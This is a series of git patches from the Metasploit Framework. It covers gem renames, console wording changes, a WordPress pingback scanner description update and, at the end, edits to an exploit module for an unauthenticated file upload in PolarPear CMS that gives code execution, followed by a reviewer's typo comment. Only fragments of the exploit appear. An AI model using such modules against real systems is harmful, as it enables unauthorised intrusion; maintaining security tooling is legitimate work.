rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb similarity index 98% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb index 8105105ee0..2d40a5f749 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb @@ -15,7 +15,6 @@ class Mdm::Workspace < ActiveRecord::Base # Relations # - has_many :cred_files, :dependent => :destroy, :class_name => 'Mdm::CredFile' has_many :creds, :through => :services, :class_name => 'Mdm::Cred' has_many :events, :class_name => 'Mdm::Event' has_many :hosts, :dependent => :destroy, :class_name => 'Mdm::Host' 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/console_db.yml
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb similarity index 95% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb index e68300cf0c..cf7d89cc68 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb @@ -3,5 +3,5 @@ module MetasploitDataModels # is considered unstable because the database migrations are still in metasploit-framework and certain models may not # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API # the version should remain below 1.0.0 - VERSION = '0.3.0' + VERSION = '0.4.0' end 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec similarity index 94% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec index 3a26fb1312..ec0d9dd672 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec @@ -19,7 +19,7 @@ Gem::Specification.new do |s| # ---- Dependencies ---- s.add_development_dependency 'rake' - s.add_runtime_dependency 'activerecord' + s.add_runtime_dependency 'activerecord', '>= 3.2.10' s.add_runtime_dependency 'activesupport' s.add_runtime_dependency 'pg' s.add_runtime_dependency 'pry' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb From 8cff88efacd9142b5f45dc70f3486caaeff0cb70 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 15:45:55 -0600 Subject: [PATCH 084/139] Change from web ui to community / pro --- lib/msf/ui/console/command_dispatcher/core.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 3d46d196c4..d180c7521e 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2651,14 +2651,14 @@ class Core protected # - # Go_pro methods -- these are used to start and connect to the - # web UI. + # Go_pro methods -- these are used to start and connect to + # Metasploit Community / Pro. def launch_metasploit_browser cmd = "/usr/bin/xdg-open" unless ::File.executable_real? cmd print_warning "Can't figure out your default browser, please visit https://localhost:3790" - print_warning "to start the web UI version of Metasploit." + print_warning "to start Metasploit Community / Pro." return false end svc_log = File.expand_path(File.join(msfbase_dir, ".." , "engine", "prosvc_stdout.log")) 
@@ -2673,14 +2673,14 @@ class Core really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready if really_started print_line - print_good "The web UI is up and running, connecting with your default browser." + print_good "Metasploit Community / Pro is up and running, connecting now." print_good "If this is your first time connecting, you will be presented with" print_good "a self-signed certificate warning. Accept it to create a new user." select(nil,nil,nil,7) system(cmd, "https://localhost:3790") elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time. print_line - print_warning "For some reason, the web UI didn't start in a timely fashion." + print_warning "For some reason, Community / Pro didn't start in a timely fashion." print_warning "You might want to restart the Metasploit services by typing" print_warning "'service metasploit restart' . Sorry it didn't work out." return false From cbce1bdff28a70cb9b84c6d4e51ac39c3249fc9d Mon Sep 17 00:00:00 2001 From: "J.Townsend" Date: Tue, 26 Feb 2013 00:24:46 +0000 Subject: [PATCH 085/139] update module description This adds the version of wordpress the issue was fixed in to the description --- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 368cb18956..34f5139649 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -19,6 +19,7 @@ class Metasploit3 < Msf::Auxiliary API enabled. By interfacing with the API an attacker can cause the wordpress site to port scan an external target and return results. Refer to the wordpress_pingback_portscanner module. + This issue was fixed in wordpress 3.5.1 }, 'Author' => [ From 181e3c0496e505b030a2abf19011f57056cda4e9 Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Mon, 25 Feb 2013 19:36:48 -0600 Subject: [PATCH 086/139] Uses normalize_uri --- .../multi/http/polarcms_upload_exec.rb | 25 ++++++++----------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 41cc4f750b..a45cecfd06 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -19,18 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PolarPearCms PHP File Upload Vulnerability', 'Description' => %q{ - This module exploits a file upload vulnerability found in PlarPear CMS + This module exploits a file upload vulnerability found in PlarPear CMS By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => [ - 'Fady Mohamed Osman <@Fady_Osman>' + 'Fady Mohamed Osman' # @Fady_Osman ], 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', 'CVE-2013-0803' ] + [ 'CVE', '2013-0803' ] ], 'Payload' => { @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'JAN 21 2012')) + 'DisclosureDate' => 'Jan 21 2012')) register_options( [ @@ -55,11 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote def check uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - + res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}includes/jquery.uploadify/upload.php" + 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', 'upload.php') }) if not res or res.code != 200 
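Review bot: The rewritten description line still spells the product `PlarPear CMS`, while the `'Name'` entry one line above it says `PolarPearCms`, and the sentence runs straight into `By abusing` with no terminator; since the commit already touches this line, it could read `This module exploits a file upload vulnerability found in PolarPear CMS.` The reference fix to `[ 'CVE', '2013-0803' ]` and the disclosure-date casing in the next hunk look right. The enclosing `update_info` call runs on into the following hunks.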
